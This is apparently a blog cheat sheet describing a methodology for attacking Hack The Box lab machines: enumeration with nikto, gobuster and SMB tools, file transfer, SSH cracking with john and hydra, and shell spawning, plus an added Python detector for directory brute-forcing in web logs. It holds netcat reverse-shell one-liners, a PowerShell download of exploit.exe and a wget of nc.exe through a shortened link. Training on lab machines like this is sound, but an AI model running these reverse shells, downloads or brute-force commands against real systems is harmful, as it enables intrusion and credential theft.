WHAT IS HACK THE BOX ?
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
Many people have asked me about the methodology I use to root machines on Hack The Box, so today I will explain in detail how I approach a Hack The Box machine.
PREPARATION
I create a separate directory for every single machine, so that I can save the files, tools and scripts I used in each box separately and note down the important things like passwords, hashes, custom scripts/payloads etc.
HOST FILE
echo "10.10.10.XX machinename.htb" | sudo tee -a /etc/hosts
sudo nano /etc/hosts
Now you can use either the IP or the hostname in commands and scripts, whichever you need. (Note that `sudo echo ... >> /etc/hosts` does not work: the redirection is performed by your unprivileged shell, not by sudo, which is why the entry is appended through `sudo tee -a` above.)
WEB ENUMERATION / DIRECTORY AND FILES BRUTE-FORCING :
NIKTO :
If port 80 or 443 is open, you can use Nikto to collect more information.
https://github.com/sullo/nikto
nikto -h https://10.10.10.XX | tee nikto.txt
GOBUSTER :
https://github.com/OJ/gobuster
gobuster dir -u http://10.10.10.XX/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .txt,.html,.php -u http://10.10.10.XX:80/ -o gobuster.txt
FFUF :
https://github.com/ffuf/ffuf
ffuf -u http://10.10.10.XX:80/FUZZ/script.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee ffuf.txt
WFUZZ :
https://github.com/xmendez/wfuzz
wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -u "http://10.10.10.XX/FUZZ.txt" -t 100 | tee wfuzz.txt
Use Seclists for More Wordlists : https://github.com/danielmiessler/SecLists
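Seen from the server side, the directory brute-forcing above leaves a very recognisable trail: one client, a burst of requests in a few seconds, almost all answered with 404, often with the tool's default User-Agent. The following is an added example of mine (not from the original post): it parses constructed Apache combined-format log lines and flags a client on either signal. The User-Agent fragments are assumed defaults that every one of these tools lets the user override, and the thresholds are arbitrary starting points.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache "combined" log format, as written by the web servers these scanners probe.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Assumed default User-Agent fragments of gobuster, Nikto, wfuzz and ffuf (all overridable).
SCANNER_UA = re.compile(r'gobuster|nikto|wfuzz|fuzz faster u fool', re.I)

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined format (or a truncated line)
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec

def flag_bruteforce(lines, window_s=60, min_reqs=20, min_404_ratio=0.8):
    """Map client IP -> sorted reasons, for clients that behave like a directory scanner."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        by_ip[rec['ip']].append(rec)
    flagged = {}
    for ip, recs in by_ip.items():
        reasons = set()
        if any(SCANNER_UA.search(r['ua']) for r in recs):
            reasons.add('scanner-ua')
        recs.sort(key=lambda r: r['ts'])
        lo = 0  # sliding window: >= min_reqs requests within window_s, mostly 404s
        for hi in range(len(recs)):
            while (recs[hi]['ts'] - recs[lo]['ts']).total_seconds() > window_s:
                lo += 1
            win = recs[lo:hi + 1]
            if len(win) >= min_reqs and sum(r['status'] == 404 for r in win) / len(win) >= min_404_ratio:
                reasons.add('404-burst')
                break
        if reasons:
            flagged[ip] = sorted(reasons)
    return flagged

def constructed_sample():
    """Constructed log lines: a gobuster burst, one Nikto probe and an ordinary visitor."""
    fmt = '{ip} - - [01/Jan/2024:10:00:{s:02d} +0000] "GET {path} HTTP/1.1" {st} 196 "-" "{ua}"'
    lines = [fmt.format(ip='10.10.14.5', s=i // 3, path=f'/dir{i}', st=404, ua='gobuster/3.6') for i in range(25)]
    lines.append(fmt.format(ip='198.51.100.7', s=30, path='/', st=200, ua='Mozilla/5.00 (Nikto/2.1.6)'))
    lines.append(fmt.format(ip='192.0.2.10', s=5, path='/index.html', st=200, ua='Mozilla/5.0'))
    lines.append(fmt.format(ip='192.0.2.10', s=7, path='/missing', st=404, ua='Mozilla/5.0'))
    return lines
```

The 404-burst rule is the one that survives a changed User-Agent; a single Nikto probe with a default UA is caught only by the string match, and the ordinary visitor with one 404 is not flagged at all.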
SERVICE ENUMERATION
EXPLOIT DB / SEARCHEXPLOIT :
https://exploit-db.com/searchsploit
sudo apt update && sudo apt -y install exploitdb
searchsploit -u
searchsploit -h
SMB ENUMERATION :
If the target is a Windows box and port 139 or 445 is open, enumerate SMB.
nmblookup -A 10.10.10.XX
nbtscan 10.10.10.XX
smbmap -H 10.10.10.XX
smbclient -L 10.10.10.XX
nmap --script smb-os-discovery 10.10.10.XX
nmap -p445 -sV --script smb-enum-services 10.10.10.XX
nmap --script smb-enum-shares -p 139,445 10.10.10.XX
nmap --script "smb-vuln*" -p 139,445 10.10.10.XX
rpcclient -U "" -N 10.10.10.XX
ENUM4LINUX :
Enumerate information from Windows and Samba systems : https://kali.org/tools/enum4linux/
enum4linux -a -o 10.10.10.XX
FILE TRANSFER IN LINUX
PYTHON HTTP SERVER :
sudo python3 -m http.server 80
sudo python -m SimpleHTTPServer 80    (Python 2 equivalent; the module no longer exists in Python 3)
wget http://[IP]/file.txt
NETCAT :
nc [IP/URL] [PORT] < filename
nc -l -p [PORT] > filename
BASE64 :
base64 file.txt
echo "aHR0cHM6Ly9oYWNrdHJvbmlhbi5pbgo=" | base64 -d > newfile.txt
SCP :
To transfer the file test.file to the other server, use the following command (fill in the user, host and destination path) :
scp test.file [USER]@[IP]:[DEST_PATH]
FILE TRANSFER IN WINDOWS
HTTP SERVER :
Local System :
service apache2 start
cp exploit.exe /var/www/html/
Target System :
firefox http://10.10.10.XX/filename.xyz
(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.XX/exploit.exe','C:\Users\USERNAME\Desktop\filename.xyz')
PSCP :
http://xray.rutgers.edu/~matilsky/documents/pscp.htm
NETCAT
INSTALLATION :
sudo apt-get install netcat
wget http://bit.ly/netcat_exe -O nc.exe
LISTEN PORT :
nc -lnvp [PORT]
CHAT SERVER :
nc -l [PORT]
nc [IP] [PORT]
Now, type anything and it will show on the listener's shell.
FILE TRANSFER :
nc [IP/URL] [PORT] < filename
nc -l -p [PORT] > filename
REVERSE SHELL :
Netcat is rarely present on production systems, and even if it is there are several versions of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.10.10.XX 1337
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.XX 1337 >/tmp/f
SSH
INSTALLATION :
sudo apt install openssh-server
CONNECTION :
CREATE SSH KEYS :
ssh-keygen
PERMISSION :
chmod 644 id_rsa.pub
chmod 600 id_rsa
SSH PASSPHRASE CRACKING USING KEY :
Download sshng2john.py
python /opt/JohnTheRipper/run/sshng2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
CRACK SSH PASSWORD USING HYDRA :
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.XX
SHELL SPAWNING
python -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')         (from within a Python interactive shell)
/bin/sh -i
/bin/bash -i
exec "/bin/sh";                     (Perl)
exec "/bin/sh"                      (Ruby)
os.execute('/bin/sh')               (Lua)
exec "/bin/sh"                      (from within IRB)
:!bash                              (from within vi)
:set shell=/bin/bash:shell          (from within vi)
!sh                                 (from within nmap interactive mode)
Interactive tty-shell : https://github.com/cornerpirate/socat-shell
More learning resources will be added soon...